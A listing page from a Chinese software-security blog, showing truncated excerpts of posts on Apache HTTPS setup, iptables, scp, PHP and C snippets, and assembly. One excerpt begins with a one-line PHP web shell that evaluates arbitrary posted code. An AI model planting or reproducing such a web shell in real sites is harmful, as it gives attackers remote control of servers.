CentOS生成自签名证书配置Apache https
exchen 8年前 (2017-01-17) 4451浏览 0评论
CentOS生成自签名证书配置Apache https apache的安装就不用说了 1.安装完apache之后,安装mod_ssl和openssl yum install mod_ssl openssl 2.安装完成之后,配置iptables打开4...
exchen's blog专注软件安全
exchen 8年前 (2017-01-17) 4451浏览 0评论
CentOS生成自签名证书配置Apache https apache的安装就不用说了 1.安装完apache之后,安装mod_ssl和openssl yum install mod_ssl openssl 2.安装完成之后,配置iptables打开4...
exchen 8年前 (2017-01-05) 4561浏览 0评论
首先编辑php.ini, 打开extension=php_sockets.dll, 修改完成之后重启apache 可以加下如下代码判断是否开启php_sockets if(extension_loaded('soc...
exchen 8年前 (2017-01-04) 11287浏览 0评论
连上VPN之后无法访问本地局域网的主机,可以在连VPN之前先添加路由表,然后再连VPN, 这样就可以解决了。 route add 192.168.1.0 mask 255.255.255.0 192.168.1.1 metric 25 转载请注明:e...
exchen 8年前 (2016-11-02) 4214浏览 0评论
#include <stdio.h> #include <pthread.h> void *start_routine(void *arg) { ...
exchen 8年前 (2016-10-12) 4779浏览 0评论
<?php for ($i=10; $i>0; $i--) { echo $i; ob_flush(); //把数据从PHP的缓冲中释放出来 flu...
exchen 8年前 (2016-09-24) 4639浏览 0评论
W3C http://www.w3.org 万维网联盟,制定了很多标准,比如html, XML, JavaScript, CSS等等 1. 获取HTML内容中的隐私数据 <html> <...
exchen 8年前 (2016-09-24) 4870浏览 0评论
login.html <html> <head><title>请登录</title></head> <body> <di...
exchen 8年前 (2016-09-17) 4417浏览 0评论
cp -Rf src dst //强制复制目录,覆盖 awk 'BEGIN { cmd="cp -ri src dst"; print "n" |cmd; }' //复制目录, 不覆盖, 相当于断点续传, 哈哈 注:src为原文件夹,d...
exchen 8年前 (2016-09-16) 4604浏览 0评论
PHP: <?php @eval($_POST['pass']);?> 1 <?php @eval($_POST['...
exchen 8年前 (2016-09-14) 4503浏览 0评论
CentOS6 iptables 配置文件在 /etc/sysconfig/iptables # Generated by iptables-save v1.4.7 on Thu Oct 5 16:53:44 2017 *filter :INPUT...
exchen 8年前 (2016-09-10) 5787浏览 0评论
1.上传文件 scp /tmp/test.tar root@192.168.1.190:/home/test.tar 2.下载文件 scp root@192.168.1.190:/home/test.tar /tmp/test.tar 3.上传整个目...
exchen 8年前 (2016-09-03) 5464浏览 0评论
int 10h 的9号功能是显示字符串 assume cs:code code segment start: mov ah,2 ;置光标 ...